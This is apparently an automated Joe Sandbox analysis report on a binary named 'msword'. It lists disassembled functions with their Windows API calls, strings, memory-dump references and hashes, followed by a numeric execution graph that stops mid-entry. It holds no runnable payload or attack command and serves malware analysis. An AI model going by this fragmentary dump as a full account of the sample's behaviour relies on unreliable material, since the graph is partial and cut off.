                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                        • String ID: Version
                                                                                        • API String ID: 512980652-315105994
                                                                                        • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                        • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                        • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                        • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                        Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                        • String ID:
                                                                                        • API String ID: 2102729457-0
                                                                                        • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                        • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                        • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                        • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                        Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                        • String ID:
                                                                                        • API String ID: 2883127279-0
                                                                                        • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                        • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                        • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                        • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                        Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                        • String ID: !N~
                                                                                        • API String ID: 623250636-529124213
                                                                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                        Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                        Strings
                                                                                        • Error launching installer, xrefs: 00405C48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleProcess
                                                                                        • String ID: Error launching installer
                                                                                        • API String ID: 3712363035-66219284
                                                                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                        Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                        • API String ID: 3509786178-2769509956
                                                                                        • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                        • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                        • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                        • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                        Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                        • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 190613189-0
                                                                                        • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                        • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                        • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                        • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.9%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:3.6%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:69
                                                                                        execution_graph 96226 20f4c0 96229 21a025 96226->96229 96228 20f4cc 96230 21a046 96229->96230 96235 21a0a3 96229->96235 96230->96235 96238 210340 96230->96238 96233 25806b 96233->96233 96234 21a0e7 96234->96228 96235->96234 96265 273fe1 82 API calls __wsopen_s 96235->96265 96236 21a077 96236->96234 96236->96235 96261 20bed9 96236->96261 96255 210376 ISource 96238->96255 96239 2205b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96239->96255 96240 25632b 96271 273fe1 82 API calls __wsopen_s 96240->96271 96242 211695 96248 20bed9 22 API calls 96242->96248 96254 21049d ISource 96242->96254 96243 22014b 22 API calls 96243->96255 96245 255cdb 96252 20bed9 22 API calls 96245->96252 96245->96254 96246 25625a 96270 273fe1 82 API calls __wsopen_s 96246->96270 96247 20bed9 22 API calls 96247->96255 96248->96254 96252->96254 96253 20bf73 22 API calls 96253->96255 96254->96236 96255->96239 96255->96240 96255->96242 96255->96243 96255->96245 96255->96246 96255->96247 96255->96253 96255->96254 96256 220413 29 API calls pre_c_initialization 96255->96256 96257 256115 96255->96257 96258 220568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96255->96258 96260 210aae ISource 96255->96260 96266 211990 191 API calls 2 library calls 96255->96266 96267 211e50 41 API calls ISource 96255->96267 96256->96255 96268 273fe1 82 API calls __wsopen_s 96257->96268 96258->96255 96269 273fe1 82 API calls __wsopen_s 96260->96269 96262 20beed 96261->96262 96264 20befc __fread_nolock 96261->96264 96262->96264 96272 22017b 96262->96272 96264->96235 96265->96233 96266->96255 96267->96255 96268->96260 96269->96254 96270->96254 96271->96254 96274 22014b 96272->96274 96275 22016a 96274->96275 96278 22016c 96274->96278 96282 22ed7c 96274->96282 96289 22521d 7 API calls 2 library calls 96274->96289 96275->96264 96277 2209dd 96291 223614 RaiseException 96277->96291 96278->96277 96290 223614 RaiseException 96278->96290 96281 2209fa 96281->96264 96287 233b93 __dosmaperr 96282->96287 96283 233bd1 96293 22f649 20 API calls __dosmaperr 96283->96293 96285 233bbc RtlAllocateHeap 96286 233bcf 96285->96286 96285->96287 96286->96274 96287->96283 96287->96285 96292 22521d 7 API calls 2 library calls 96287->96292 96289->96274 96290->96277 96291->96281 96292->96287 96293->96286 96294 238782 96299 23853e 96294->96299 96297 2387aa 96304 23856f try_get_first_available_module 96299->96304 96301 23876e 96318 232b5c 26 API calls __cftof 96301->96318 96303 2386c3 96303->96297 96311 240d04 96303->96311 96310 2386b8 96304->96310 96314 22917b 40 API calls 2 library calls 96304->96314 96306 23870c 96306->96310 96315 22917b 40 API calls 2 library calls 96306->96315 96308 23872b 96308->96310 96316 22917b 40 API calls 2 library calls 96308->96316 96310->96303 96317 22f649 20 API calls __dosmaperr 96310->96317 96319 240401 96311->96319 96313 240d1f 96313->96297 96314->96306 96315->96308 96316->96310 96317->96301 96318->96303 96321 24040d ___DestructExceptionObject 96319->96321 96320 24041b 96377 22f649 20 API calls __dosmaperr 96320->96377 96321->96320 96323 240454 96321->96323 96330 2409db 96323->96330 96324 240420 96378 232b5c 26 API calls __cftof 96324->96378 96329 24042a __wsopen_s 96329->96313 96380 2407af 96330->96380 96333 240a26 96398 235594 96333->96398 96334 240a0d 96412 22f636 20 API calls __dosmaperr 96334->96412 96337 240a12 96413 22f649 20 API calls __dosmaperr 96337->96413 96338 240a2b 96339 240a34 96338->96339 96340 240a4b 96338->96340 96414 22f636 20 API calls __dosmaperr 96339->96414 96411 24071a CreateFileW 96340->96411 96344 240478 96379 2404a1 LeaveCriticalSection __wsopen_s 96344->96379 96345 240a39 96415 22f649 20 API calls __dosmaperr 96345->96415 96346 240b01 GetFileType 96349 240b53 96346->96349 96350 240b0c GetLastError 96346->96350 96348 240ad6 GetLastError 96417 22f613 20 API calls 2 library calls 96348->96417 96420 2354dd 21 API calls 3 library calls 96349->96420 96418 22f613 20 API calls 2 library calls 96350->96418 96351 240a84 96351->96346 96351->96348 96416 24071a CreateFileW 96351->96416 96355 240b1a CloseHandle 96355->96337 96356 240b43 96355->96356 96419 22f649 20 API calls __dosmaperr 96356->96419 96358 240ac9 96358->96346 96358->96348 96360 240b74 96362 240bc0 96360->96362 96421 24092b 72 API calls 4 library calls 96360->96421 96361 240b48 96361->96337 96366 240bed 96362->96366 96422 2404cd 72 API calls 4 library calls 96362->96422 96365 240be6 96365->96366 96367 240bfe 96365->96367 96423 238a2e 96366->96423 96367->96344 96369 240c7c CloseHandle 96367->96369 96438 24071a CreateFileW 96369->96438 96371 240ca7 96372 240cb1 GetLastError 96371->96372 96373 240cdd 96371->96373 96439 22f613 20 API calls 2 library calls 96372->96439 96373->96344 96375 240cbd 96440 2356a6 21 API calls 3 library calls 96375->96440 96377->96324 96378->96329 96379->96329 96381 2407ea 96380->96381 96382 2407d0 96380->96382 96441 24073f 96381->96441 96382->96381 96448 22f649 20 API calls __dosmaperr 96382->96448 96385 2407df 96449 232b5c 26 API calls __cftof 96385->96449 96387 240822 96388 240851 96387->96388 96450 22f649 20 API calls __dosmaperr 96387->96450 96391 2408a4 96388->96391 96452 22da7d 26 API calls 2 library calls 96388->96452 96391->96333 96391->96334 96392 24089f 96392->96391 96394 24091e 96392->96394 96393 240846 96451 232b5c 26 API calls __cftof 96393->96451 96453 232b6c 11 API calls _abort 96394->96453 96397 24092a 96399 2355a0 ___DestructExceptionObject 96398->96399 96456 2332d1 EnterCriticalSection 96399->96456 96402 2355a7 96403 2355cc 96402->96403 96406 23563a EnterCriticalSection 96402->96406 96409 2355ee 96402->96409 96460 235373 21 API calls 3 library calls 96403->96460 96404 235617 __wsopen_s 96404->96338 96408 235647 LeaveCriticalSection 96406->96408 96406->96409 96407 2355d1 96407->96409 96461 2354ba EnterCriticalSection 96407->96461 96408->96402 96457 23569d 96409->96457 96411->96351 96412->96337 96413->96344 96414->96345 96415->96337 96416->96358 96417->96337 96418->96355 96419->96361 96420->96360 96421->96362 96422->96365 96463 235737 96423->96463 96425 238a44 96476 2356a6 21 API calls 3 library calls 96425->96476 96427 238a3e 96427->96425 96428 235737 __wsopen_s 26 API calls 96427->96428 96437 238a76 96427->96437 96431 238a6d 96428->96431 96429 235737 __wsopen_s 26 API calls 96432 238a82 CloseHandle 96429->96432 96430 238a9c 96433 238abe 96430->96433 96477 22f613 20 API calls 2 library calls 96430->96477 96434 235737 __wsopen_s 26 API calls 96431->96434 96432->96425 96435 238a8e GetLastError 96432->96435 96433->96344 96434->96437 96435->96425 96437->96425 96437->96429 96438->96371 96439->96375 96440->96373 96444 240757 96441->96444 96442 240772 96442->96387 96444->96442 96454 22f649 20 API calls __dosmaperr 96444->96454 96445 240796 96455 232b5c 26 API calls __cftof 96445->96455 96447 2407a1 96447->96387 96448->96385 96449->96381 96450->96393 96451->96388 96452->96392 96453->96397 96454->96445 96455->96447 96456->96402 96462 233319 LeaveCriticalSection 96457->96462 96459 2356a4 96459->96404 96460->96407 96461->96409 96462->96459 96464 235744 96463->96464 96468 235759 96463->96468 96478 22f636 20 API calls __dosmaperr 96464->96478 96467 235749 96479 22f649 20 API calls __dosmaperr 96467->96479 96471 23577e 96468->96471 96480 22f636 20 API calls __dosmaperr 96468->96480 96469 235789 96481 22f649 20 API calls __dosmaperr 96469->96481 96471->96427 96473 235751 96473->96427 96474 235791 96482 232b5c 26 API calls __cftof 96474->96482 96476->96430 96477->96433 96478->96467 96479->96473 96480->96469 96481->96474 96482->96473 96483 201044 96488 202793 96483->96488 96485 20104a 96523 220413 29 API calls __onexit 96485->96523 96487 201054 96524 202a38 96488->96524 96492 20280a 96534 20bf73 96492->96534 96495 20bf73 22 API calls 96496 20281e 96495->96496 96497 20bf73 22 API calls 96496->96497 96498 202828 96497->96498 96499 20bf73 22 API calls 96498->96499 96500 202866 96499->96500 96501 20bf73 22 API calls 96500->96501 96502 202932 96501->96502 96539 202dbc 96502->96539 96506 202964 96507 20bf73 22 API calls 96506->96507 96508 20296e 96507->96508 96566 213160 96508->96566 96510 202999 96576 203166 96510->96576 96512 2029b5 96513 2029c5 GetStdHandle 96512->96513 96514 2439e7 96513->96514 96515 202a1a 96513->96515 96514->96515 96583 22014b 96514->96583 96517 202a27 OleInitialize 96515->96517 96517->96485 96518 2439f7 96593 270ac4 InitializeCriticalSectionAndSpinCount 96518->96593 96520 243a00 96596 2712eb 96520->96596 96523->96487 96599 202a91 96524->96599 96527 202a91 22 API calls 96528 202a70 96527->96528 96529 20bf73 22 API calls 96528->96529 96530 202a7c 96529->96530 96606 208577 96530->96606 96532 2027c9 96533 20327e 6 API calls 96532->96533 96533->96492 96535 22017b 22 API calls 96534->96535 96536 20bf88 96535->96536 96537 22014b 22 API calls 96536->96537 96538 202814 96537->96538 96538->96495 96540 20bf73 22 API calls 96539->96540 96541 202dcc 96540->96541 96542 20bf73 22 API calls 96541->96542 96543 202dd4 96542->96543 96629 2081d6 96543->96629 96546 2081d6 22 API calls 96547 202de4 96546->96547 96548 20bf73 22 API calls 96547->96548 96549 202def 96548->96549 96550 22014b 22 API calls 96549->96550 96551 20293c 96550->96551 96552 203205 96551->96552 96553 203213 96552->96553 96554 20bf73 22 API calls 96553->96554 96555 20321e 96554->96555 96556 20bf73 22 API calls 96555->96556 96557 203229 96556->96557 96558 20bf73 22 API calls 96557->96558 96559 203234 96558->96559 96560 20bf73 22 API calls 96559->96560 96561 20323f 96560->96561 96562 2081d6 22 API calls 96561->96562 96563 20324a 96562->96563 96564 22014b 22 API calls 96563->96564 96565 203251 RegisterWindowMessageW 96564->96565 96565->96506 96567 2131a1 96566->96567 96571 21317d 96566->96571 96632 2205b2 5 API calls __Init_thread_wait 96567->96632 96570 2131ab 96570->96571 96633 220568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96570->96633 96575 21318e 96571->96575 96634 2205b2 5 API calls __Init_thread_wait 96571->96634 96572 219f47 96572->96575 96635 220568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96572->96635 96575->96510 96577 203176 96576->96577 96578 243c8f 96576->96578 96579 22014b 22 API calls 96577->96579 96636 273c4e 22 API calls 96578->96636 96582 20317e 96579->96582 96581 243c9a 96582->96512 96585 220150 96583->96585 96584 22ed7c ___std_exception_copy 21 API calls 96584->96585 96585->96584 96586 22016a 96585->96586 96589 22016c 96585->96589 96637 22521d 7 API calls 2 library calls 96585->96637 96586->96518 96588 2209dd 96639 223614 RaiseException 96588->96639 96589->96588 96638 223614 RaiseException 96589->96638 96592 2209fa 96592->96518 96640 270d18 96593->96640 96597 243a0c CloseHandle 96596->96597 96598 2712f9 CreateThread 96596->96598 96597->96515 96598->96597 96643 2712d1 96598->96643 96600 20bf73 22 API calls 96599->96600 96601 202a9c 96600->96601 96602 20bf73 22 API calls 96601->96602 96603 202aa4 96602->96603 96604 20bf73 22 API calls 96603->96604 96605 202a66 96604->96605 96605->96527 96607 246610 96606->96607 96608 